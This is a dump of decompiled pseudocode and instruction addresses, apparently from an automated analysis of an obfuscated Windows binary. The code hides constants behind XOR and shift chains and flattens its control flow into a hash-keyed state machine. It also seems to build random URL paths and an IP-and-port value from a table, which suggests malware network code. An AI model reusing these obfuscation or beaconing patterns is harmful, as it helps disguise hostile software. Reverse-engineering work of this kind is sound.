				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x00007322;
				 *(_t1012 + 0xa4) = 0x3711;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) >> 6;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) + 0x3b98;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x00002f0a;
				 *(_t1012 + 0x24) = 0xdc2f;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xf29ba80e;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) / _t889;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0x267d;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0x068eac78;
				 *(_t1012 + 0x54) = 0xb4c2;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) >> 4;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x633a81e3;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xd55c9070;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xb6663903;
				 *(_t1012 + 0xc0) = 0x8be9;
				_t890 = 0x3b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xc0) / _t890;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) + 0xffff9a8b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) ^ 0xffffa766;
				 *(_t1012 + 0x78) = 0x5bde;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) * 0x59;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) << 0xd;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) >> 9;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) ^ 0x007f2aa6;
				 *(_t1012 + 0x90) = 0x411a;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0xcf7ab9d1;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) >> 7;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x019eb365;
				 *(_t1012 + 0xe0) = 0x6764;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5056;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5d89;
				 *(_t1012 + 0x108) = 0x76f2;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb105586c;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb10528cb;
				 *(_t1012 + 0xe8) = 0x1628;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) << 0xf;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) ^ 0x0b146bd8;
				 *(_t1012 + 0x13c) = 0x8150;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01db2c46;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01dbc499;
				 *(_t1012 + 0x28) = 0xe57d;
				 *(_t1012 + 0x28) =  *(_t1012 + 0x28) + 0xffff940d;
				_t891 = 0x52;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x28) * 0xa;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) / _t891;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0x00002d62;
				 *(_t1012 + 0xd4) = 0xda51;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 8;
				_t892 = 0x2f;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) / _t892;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x0004b460;
				 *(_t1012 + 0x144) = 0xc4bd;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) | 0x99168015;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) ^ 0x991680ca;
				 *(_t1012 + 0x4c) = 0xf40b;
				_t893 = 0xf;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x4c) * 0x64;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) >> 0x10;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0x4d44;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0x00003d1f;
				 *(_t1012 + 0x80) = 0xe0fb;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x7a83a018;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x3dd3f5db;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x2cc23c84;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x6b92f75e;
				 *(_t1012 + 0x40) = 0x3ba;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xe0c2;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) * 0x6e;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0x8785;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x00629da9;
				 *(_t1012 + 0x110) = 0xc1c4;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb305b232;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb3050daf;
				 *(_t1012 + 0x138) = 0x83df;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f2297cb;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f221ab4;
				 *(_t1012 + 0xec) = 0xe7e3;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) >> 0xe;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) ^ 0x00003f29;
				 *(_t1012 + 0x6c) = 0x9be6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) | 0xdb39baf6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) * 0xe;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 4;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0xd2843690;
				 *(_t1012 + 0x98) = 0x25e5;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) * 0x5f;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xf2a9;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x000f50c4;
				 *(_t1012 + 0xf0) = 0x6aad;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) >> 0xb;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) ^ 0x00000b06;
				 *(_t1012 + 0x11c) = 0xe6d7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) * 0x44;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x003d0209;
				 *(_t1012 + 0x58) = 0xa945;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) / _t893;
				_t894 = 0x22;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x58) / _t894;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0x1aba;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003b06;
				 *(_t1012 + 0x64) = 0x44c5;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) + 0x4f06;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xe;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) >> 0xb;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x0004ce26;
				 *(_t1012 + 0x3c) = 0xcc93;
				_t895 = 0x1a;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t895;
				_t896 = 0x29;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t896;
				_t897 = 0x77;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t897;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) ^ 0x000043f4;
				 *(_t1012 + 0x12c) = 0xa0a2;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84551b;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84971f;
				 *(_t1012 + 0x74) = 0xdad7;
				_t898 = 0x26;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) / _t898;
				_t899 = 0x42;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) * 0x48;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xffff34f2;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x0000936e;
				 *(_t1012 + 0x34) = 0x892d;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) >> 6;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0xe5fcb6e4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) << 4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0x5fcb3f6d;
				 *(_t1012 + 0xfc) = 0x9a3e;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) / _t899;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x00006544;
				 *(_t1012 + 0x124) = 0x2293;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) + 0x79b;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) ^ 0x00006b1d;
				 *(_t1012 + 0xbc) = 0x3e81;
				_t900 = 7;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xbc) * 0x31;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) + 0xb35c;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) ^ 0x000cf45c;
				 *(_t1012 + 0x64) = 0x7cb6;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x88e3463d;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) * 0x56;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xf;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0xd559658e;
				 *(_t1012 + 0xac) = 0xf45a;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) / _t900;
				_t901 = 0x60;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) * 0x3e;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) ^ 0x000800e5;
				 *(_t1012 + 0xe4) = 0xf8f;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) >> 4;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) ^ 0x0000477d;
				 *(_t1012 + 0xdc) = 0xf07b;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) >> 0xb;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00007281;
				 *(_t1012 + 0xd4) = 0xb5b1;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 0xd;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) + 0xffff2f0a;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x16b57b93;
				 *(_t1012 + 0x10c) = 0xd67e;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b92c7;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b23c9;
				 *(_t1012 + 0xcc) = 0x2221;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) << 2;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) >> 6;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) ^ 0x0000659f;
				 *(_t1012 + 0x104) = 0x2a0b;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) >> 4;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x000066a5;
				 *(_t1012 + 0xc8) = 0x810d;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) / _t901;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) << 0x10;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) ^ 0x01580000;
				_t902 =  *((intOrPtr*)(_t1012 + 0x158));
				 *((intOrPtr*)(_t1012 + 0x14)) =  *((intOrPtr*)(_t1012 + 0x15c));
				 *((intOrPtr*)(_t1012 + 0x154)) = _t902;
				while(1) {
					_t1015 = _t906 - 0x1e362325;
					if(_t1015 > 0) {
						goto L30;
					}
					L2:
					if(_t1015 == 0) {
						_push(_t906);
						_t1001 = E001FADBD( *((intOrPtr*)(_t997 + 4)));
						_t902 = E002057E8(_t838);
						 *((intOrPtr*)(_t1012 + 0x158)) = _t902;
						__eflags = _t902;
						if(__eflags != 0) {
							_t823 = E0020BD4A( *(_t1012 + 0xc0),  *(_t1012 + 0x3c), __eflags, _t902,  *(_t1012 + 0xcc), _t1001,  *_t997,  *((intOrPtr*)(_t997 + 4)));
							_t1012 = _t1012 + 0x14;
							 *((intOrPtr*)(_t1012 + 0x14)) = _t823;
							__eflags = _t823;
							if(__eflags == 0) {
								E001F91CD( *(_t1012 + 0x90),  *((intOrPtr*)(_t1012 + 0x120)),  *(_t1012 + 0x84), _t902,  *(_t1012 + 0x74));
							} else {
								_t906 = 0x30070f42;
								goto L13;
							}
						}
					} else {
						_t1016 = _t906 - 0x12f44b45;
						if(_t1016 > 0) {
							__eflags = _t906 - 0x1993ee00;
							if(_t906 == 0x1993ee00) {
								_t926 = _t1012 + 0x17c;
								E002006C2(_t926,  *(_t1012 + 0xb4),  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0x11c), _t1012 + 0x158);
								_t1012 = _t1012 + 0xc;
								asm("sbb ecx, ecx");
								_t906 = (_t926 & 0x08d2d6d7) + 0x3077984c;
								goto L10;
							} else {
								__eflags = _t906 - 0x1bb47d9a;
								if(_t906 == 0x1bb47d9a) {
									 *(_t1012 + 0x164) =  *(_t1012 + 0xc8);
									 *(_t1012 + 0x168) =  *(_t1012 + 0x168) & 0x00000000;
									_t928 =  *(_t1012 + 0x168);
									E001FADCE(_t928,  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xa4), _t1012 + 0x1a4,  *(_t1012 + 0x5c),  *(_t1012 + 0x128), _t1012 + 0x29c, _t1012 + 0x17c, _t1012 + 0x168,  *((intOrPtr*)(_t1012 + 0x140)),  *((intOrPtr*)(_t1012 + 0x16c)), _t1012 + 0x488);
									_t1012 = _t1012 + 0x28;
									asm("sbb ecx, ecx");
									_t906 = (_t928 & 0x1b5b9d4f) + 0x12f44b45;
									goto L10;
								} else {
									__eflags = _t906 - 0x1bef9ca6;
									if(_t906 != 0x1bef9ca6) {
										goto L44;
									} else {
										_t998 = _t1012 + 0x288;
										_t930 = 6;
										_t1010 =  *(_t1012 + 0x14c) % _t930 + 1;
										__eflags = _t1010;
										if(__eflags != 0) {
											__eflags = 1;
											do {
												_t881 = 0xf;
												_t1006 = ( *(_t1012 + 0x14c) & _t881) + 4;
												E001F60DA(_t1012 + 0x14c,  *(_t1012 + 0xe8), 1, _t1006,  *(_t1012 + 0x13c),  *(_t1012 + 0x108),  *(_t1012 + 0xa4), _t998);
												_t1012 = _t1012 + 0x18;
												_t999 = _t998 + _t1006 * 2;
												_t883 = 0x2f;
												 *_t999 = _t883;
												_t998 = _t999 + 2;
												_t1010 = _t1010 - 1;
												__eflags = _t1010;
											} while (__eflags != 0);
											_t902 =  *((intOrPtr*)(_t1012 + 0x154));
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
										}
										_t1008 =  *((intOrPtr*)(_t1012 + 0x150));
										 *_t998 = 0;
										_t906 = 0x93c2f64;
										_t823 =  *((intOrPtr*)(_t1012 + 0x14));
										_t997 =  *((intOrPtr*)(_t1012 + 0xc90));
										continue;
									}
								}
							}
						} else {
							if(_t1016 == 0) {
								E001F91CD( *(_t1012 + 0x6c),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0x130),  *((intOrPtr*)(_t1012 + 0x170)),  *((intOrPtr*)(_t1012 + 0x70)));
								_t1012 = _t1012 + 0xc;
								_t906 = 0x1ac68c4;
								goto L10;
							} else {
								if(_t906 == 0x1ac68c4) {
									E001F91CD( *(_t1012 + 0x3c),  *(_t1012 + 0x104),  *(_t1012 + 0x128),  *((intOrPtr*)(_t1012 + 0x15c)),  *(_t1012 + 0xb8));
									_t1012 = _t1012 + 0xc;
									_t906 = 0x3077984c;
									goto L10;
								} else {
									if(_t906 == 0x4136454) {
										E001F91CD( *(_t1012 + 0xa4),  *(_t1012 + 0xfc),  *(_t1012 + 0x124),  *(_t1012 + 0x164),  *(_t1012 + 0x58));
										_t1012 = _t1012 + 0xc;
										_t906 = 0x12f44b45;
										goto L10;
									} else {
										if(_t906 == 0x599ba18) {
											_push(0x1f14d4);
											_push( *(_t1012 + 0xc0));
											E002064EC(_t1012 + 0x214, __eflags, E0020BF25( *(_t1012 + 0x28),  *(_t1012 + 0x58), __eflags),  *(_t1012 + 0x98), 0x400, _t1012 + 0x2a0, _t1012 + 0x198,  *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0xec),  *(_t1012 + 0x110));
											E0020C5F7( *(_t1012 + 0x11c),  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x58),  *(_t1012 + 0xfc), _t861);
											_t1012 = _t1012 + 0x34;
											_t906 = 0x2dee6d8e;
											L12:
											_t823 =  *((intOrPtr*)(_t1012 + 0x14));
											L13:
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
											continue;
										} else {
											_t1020 = _t906 - 0x93c2f64;
											if(_t906 != 0x93c2f64) {
												L44:
												__eflags = _t906 - 0x12d8e207;
												if(__eflags != 0) {
													continue;
													do {
														while(1) {
															_t1015 = _t906 - 0x1e362325;
															if(_t1015 > 0) {
																goto L30;
															}
															goto L2;
														}
														goto L30;
													} while (__eflags != 0);
													goto L45;
												} else {
													L45:
												}
											} else {
												E001F5856(_t1012 + 0x208, _t997, _t1020);
												_t906 = 0x599ba18;
												L10:
												_t823 =  *((intOrPtr*)(_t1012 + 0x14));
												while(1) {
													_t1015 = _t906 - 0x1e362325;
													if(_t1015 > 0) {
														goto L30;
													}
													goto L2;
												}
											}
										}
									}
								}
							}
						}
					}
					L47:
					return _t1008;
					L30:
					__eflags = _t906 - 0x22fa333e;
					if(_t906 == 0x22fa333e) {
						E001F91CD( *(_t1012 + 0xe0),  *((intOrPtr*)(_t1012 + 0x118)),  *(_t1012 + 0xd4), _t902,  *(_t1012 + 0x104));
						_t823 =  *((intOrPtr*)(_t1012 + 0x20));
						_t1012 = _t1012 + 0xc;
						_t906 = 0x12d8e207;
						goto L44;
					} else {
						__eflags = _t906 - 0x2a5de1a5;
						if(_t906 == 0x2a5de1a5) {
							 *(_t1012 + 0x14c) = E00207B6B();
							_t906 = 0x1e362325;
							goto L10;
						} else {
							__eflags = _t906 - 0x2dee6d8e;
							if(_t906 == 0x2dee6d8e) {
								E00201259(_t1012 + 0x15c, _t1012 + 0x20c, _t1012 + 0x16c);
								_pop(_t909);
								asm("sbb ecx, ecx");
								_t906 = (_t909 & 0x1a0814d6) + 0x1ac68c4;
								goto L10;
							} else {
								__eflags = _t906 - 0x2e4fe894;
								if(_t906 == 0x2e4fe894) {
									__eflags = E001FC07D( *((intOrPtr*)(_t1012 + 0xc98)), _t1012 + 0x164,  *(_t1012 + 0xf0),  *(_t1012 + 0x6c));
									_t906 = 0x4136454;
									_t831 = 1;
									_t1008 =  !=  ? _t831 : _t1008;
									 *((intOrPtr*)(_t1012 + 0x150)) = _t1008;
									goto L10;
								} else {
									__eflags = _t906 - 0x30070f42;
									if(_t906 == 0x30070f42) {
										 *((intOrPtr*)(_t1012 + 0x188)) = _t823;
										_t914 = _t1012 + 0x178;
										 *((intOrPtr*)(_t1012 + 0x180)) = _t1002;
										 *((intOrPtr*)(_t1012 + 0x18c)) = _t902;
										E001FA83A(_t914,  *((intOrPtr*)(_t1012 + 0xd0)),  *(_t1012 + 0x90), _t1012 + 0x180,  *(_t1012 + 0xb4));
										_t1012 = _t1012 + 0xc;
										asm("sbb ecx, ecx");
										_t906 = (_t914 & 0xf699bac2) + 0x22fa333e;
										goto L10;
									} else {
										__eflags = _t906 - 0x3077984c;
										if(_t906 == 0x3077984c) {
											E001F91CD( *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xb8),  *(_t1012 + 0xec),  *(_t1012 + 0x178),  *(_t1012 + 0xdc));
											_t1012 = _t1012 + 0xc;
											_t906 = 0x22fa333e;
											goto L10;
										} else {
											__eflags = _t906 - 0x394a6f23;
											if(__eflags != 0) {
												goto L44;
											} else {
												_push(0x1f14a4);
												_push( *(_t1012 + 0x90));
												E001F3482( *(_t1012 + 0x6c), __eflags, ( *( *0x2121c0 + 0x18))[3] & 0x000000ff, _t1012 + 0x1b4,  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x14c),  *( *( *0x2121c0 + 0x18)) & 0x000000ff, ( *( *0x2121c0 + 0x18))[2] & 0x000000ff, 0x40, ( *( *0x2121c0 + 0x18))[1] & 0x000000ff, E0020BF25( *(_t1012 + 0x13c),  *(_t1012 + 0x9c), __eflags),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0xb0),  *(_t1012 + 0xa4));
												E0020C5F7( *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0x98),  *((intOrPtr*)(_t1012 + 0x16c)),  *(_t1012 + 0x88), _t867);
												_t1012 = _t1012 + 0x44;
												_t906 = 0x1bef9ca6;
												 *(_t1012 + 0x168) = ( *( *0x2121c0 + 0x18))[4] & 0x0000ffff;
												goto L12;
											}
										}
									}
								}
							}
						}
					}
					goto L47;
				}
			}

0x00209dd1
0x00209dd8
0x00209ddf
0x00209de0
0x00209de7
0x00209de8
0x00209de9
0x00209dea
0x00209def
0x00209dfa
0x00209e04
0x00209e07
0x00209e0e
0x00209e13
0x00209e1a
0x00209e25
0x00209e30
0x00209e3b
0x00209e46
0x00209e4e
0x00209e53
0x00209e5b
0x00209e63
0x00209e6b
0x00209e73
0x00209e78
0x00209e80
0x00209e88
0x00209e90
0x00209e9b
0x00209ea6
0x00209eb1
0x00209ebe
0x00209ec2
0x00209eca
0x00209ed2
0x00209eda
0x00209ee5
0x00209ef0
0x00209ef7
0x00209f02
0x00209f0a
0x00209f12
0x00209f1a
0x00209f22
0x00209f2a
0x00209f35
0x00209f48
0x00209f4f
0x00209f5a
0x00209f6d
0x00209f74
0x00209f7f
0x00209f87
0x00209f92
0x00209f9d
0x00209fa4
0x00209faf
0x00209fb7
0x00209fbc
0x00209fc4
0x00209fcc
0x00209fd4
0x00209fdc
0x00209fe1
0x00209fe9
0x00209ff1
0x00209ff9
0x0020a004
0x0020a017
0x0020a01e
0x0020a029
0x0020a036
0x0020a041
0x0020a049
0x0020a054
0x0020a05f
0x0020a067
0x0020a06f
0x0020a07a
0x0020a085
0x0020a090
0x0020a098
0x0020a0a3
0x0020a0b1
0x0020a0b6
0x0020a0bc
0x0020a0c1
0x0020a0c6
0x0020a0ce
0x0020a0d9
0x0020a0e4
0x0020a0ef
0x0020a0fa
0x0020a105
0x0020a110
0x0020a11b
0x0020a126
0x0020a131
0x0020a13c
0x0020a147
0x0020a152
0x0020a15d
0x0020a168
0x0020a174
0x0020a179
0x0020a17f
0x0020a18c
0x0020a18f
0x0020a193
0x0020a19b
0x0020a1a3
0x0020a1a8
0x0020a1ad
0x0020a1b5
0x0020a1bd
0x0020a1d3
0x0020a1da
0x0020a1e5
0x0020a1f0
0x0020a1f8
0x0020a203
0x0020a20b
0x0020a213
0x0020a21b
0x0020a220
0x0020a228
0x0020a23b
0x0020a23c
0x0020a24b
0x0020a252
0x0020a25d
0x0020a271
0x0020a278
0x0020a285
0x0020a290
0x0020a298
0x0020a2a0
0x0020a2a8
0x0020a2ad
0x0020a2b5
0x0020a2bd
0x0020a2cc
0x0020a2cf
0x0020a2d8
0x0020a2dc
0x0020a2e4
0x0020a2ef
0x0020a2f7
0x0020a302
0x0020a30f
0x0020a313
0x0020a318
0x0020a320
0x0020a328
0x0020a33e
0x0020a345
0x0020a350
0x0020a363
0x0020a366
0x0020a36d
0x0020a378
0x0020a383
0x0020a38e
0x0020a399
0x0020a3a4
0x0020a3ac
0x0020a3b7
0x0020a3c2
0x0020a3ca
0x0020a3da
0x0020a3de
0x0020a3e6
0x0020a3ee
0x0020a3f6
0x0020a3fb
0x0020a403
0x0020a40b
0x0020a413
0x0020a425
0x0020a428
0x0020a42f
0x0020a43a
0x0020a445
0x0020a452
0x0020a456
0x0020a45b
0x0020a460
0x0020a468
0x0020a473
0x0020a47e
0x0020a486
0x0020a491
0x0020a49c
0x0020a4a7
0x0020a4b2
0x0020a4bd
0x0020a4c8
0x0020a4d5
0x0020a4e0
0x0020a4e8
0x0020a4f3
0x0020a4fe
0x0020a509
0x0020a514
0x0020a51c
0x0020a52b
0x0020a52e
0x0020a53a
0x0020a53e
0x0020a546
0x0020a551
0x0020a560
0x0020a565
0x0020a56e
0x0020a579
0x0020a584
0x0020a58f
0x0020a59a
0x0020a5a7
0x0020a5a8
0x0020a5ac
0x0020a5b1
0x0020a5b9
0x0020a5c1
0x0020a5cc
0x0020a5d7
0x0020a5e2
0x0020a5ed
0x0020a5f8
0x0020a600
0x0020a60d
0x0020a611
0x0020a619
0x0020a621
0x0020a62c
0x0020a637
0x0020a642
0x0020a64d
0x0020a658
0x0020a663
0x0020a66e
0x0020a676
0x0020a681
0x0020a689
0x0020a696
0x0020a69a
0x0020a69f
0x0020a6a7
0x0020a6ba
0x0020a6c1
0x0020a6cc
0x0020a6d7
0x0020a6e2
0x0020a6ea
0x0020a6f5
0x0020a708
0x0020a70f
0x0020a71a
0x0020a728
0x0020a734
0x0020a739
0x0020a73f
0x0020a747
0x0020a74f
0x0020a757
0x0020a75f
0x0020a764
0x0020a769
0x0020a771
0x0020a77d
0x0020a782
0x0020a78c
0x0020a791
0x0020a79b
0x0020a7a0
0x0020a7a6
0x0020a7ae
0x0020a7b9
0x0020a7c4
0x0020a7cf
0x0020a7db
0x0020a7e0
0x0020a7eb
0x0020a7ee
0x0020a7f2
0x0020a7fa
0x0020a802
0x0020a80a
0x0020a80f
0x0020a817
0x0020a81c
0x0020a824
0x0020a83a
0x0020a841
0x0020a84c
0x0020a857
0x0020a862
0x0020a86d
0x0020a880
0x0020a881
0x0020a888
0x0020a893
0x0020a89e
0x0020a8a6
0x0020a8b3
0x0020a8b7
0x0020a8bc
0x0020a8c4
0x0020a8d8
0x0020a8eb
0x0020a8ec
0x0020a8f3
0x0020a8fe
0x0020a909
0x0020a911
0x0020a91c
0x0020a927
0x0020a92f
0x0020a93a
0x0020a945
0x0020a94d
0x0020a958
0x0020a963
0x0020a96e
0x0020a979
0x0020a984
0x0020a98f
0x0020a997
0x0020a99f
0x0020a9aa
0x0020a9b5
0x0020a9bd
0x0020a9c8
0x0020a9dc
0x0020a9e3
0x0020a9eb
0x0020a9fd
0x0020aa04
0x0020aa08
0x0020aa0f
0x0020aa0f
0x0020aa15
0x00000000
0x00000000
0x0020aa1b
0x0020aa1b
0x0020ad25
0x0020ad2e
0x0020ad42
0x0020ad44
0x0020ad4c
0x0020ad4e
0x0020ad6d
0x0020ad72
0x0020ad75
0x0020ad79
0x0020ad7b
0x0020b009
0x0020ad81
0x0020ad81
0x00000000
0x0020ad81
0x0020ad7b
0x0020aa21
0x0020aa21
0x0020aa27
0x0020ab9d
0x0020aba3
0x0020acee
0x0020ad00
0x0020ad05
0x0020ad0a
0x0020ad12
0x00000000
0x0020aba9
0x0020aba9
0x0020abaf
0x0020ac60
0x0020ac76
0x0020acbb
0x0020acc2
0x0020acc7
0x0020accc
0x0020acd4
0x00000000
0x0020abb5
0x0020abb5
0x0020abbb
0x00000000
0x0020abc1
0x0020abc8
0x0020abd3
0x0020abd8
0x0020abd8
0x0020abd9
0x0020abdd
0x0020abde
0x0020abee
0x0020ac00
0x0020ac13
0x0020ac18
0x0020ac1b
0x0020ac20
0x0020ac21
0x0020ac24
0x0020ac27
0x0020ac27
0x0020ac27
0x0020ac2a
0x0020ac31
0x0020ac31
0x0020ac38
0x0020ac41
0x0020ac44
0x0020ac49
0x0020ac4d
0x00000000
0x0020ac4d
0x0020abbb
0x0020abaf
0x0020aa2d
0x0020aa2d
0x0020ab8b
0x0020ab90
0x0020ab93
0x00000000
0x0020aa33
0x0020aa39
0x0020ab5f
0x0020ab64
0x0020ab67
0x00000000
0x0020aa3f
0x0020aa45
0x0020ab2d
0x0020ab32
0x0020ab35
0x00000000
0x0020aa4b
0x0020aa51
0x0020aa76
0x0020aa7b
0x0020aad1
0x0020aaf0
0x0020aaf5
0x0020aaf8
0x0020aafd
0x0020aafd
0x0020ab01
0x0020ab01
0x00000000
0x0020aa53
0x0020aa53
0x0020aa59
0x0020afe1
0x0020afe1
0x0020afe7
0x00000000
0x0020aa0f
0x0020aa0f
0x0020aa0f
0x0020aa15
0x00000000
0x00000000
0x00000000
0x0020aa15
0x00000000
0x0020aa0f
0x00000000
0x00000000
0x0020afed
0x0020afed
0x0020aa5f
0x0020aa66
0x0020aa6b
0x0020aa70
0x0020aa70
0x0020aa0f
0x0020aa0f
0x0020aa15
0x00000000
0x00000000
0x00000000
0x0020aa15
0x0020aa0f
0x0020aa59
0x0020aa51
0x0020aa45
0x0020aa39
0x0020aa2d
0x0020aa27
0x0020b013
0x0020b01d
0x0020ad8b
0x0020ad8b
0x0020ad91
0x0020afd0
0x0020afd5
0x0020afd9
0x0020afdc
0x00000000
0x0020ad97
0x0020ad97
0x0020ad9d
0x0020afa2
0x0020afa9
0x00000000
0x0020ada3
0x0020ada3
0x0020ada9
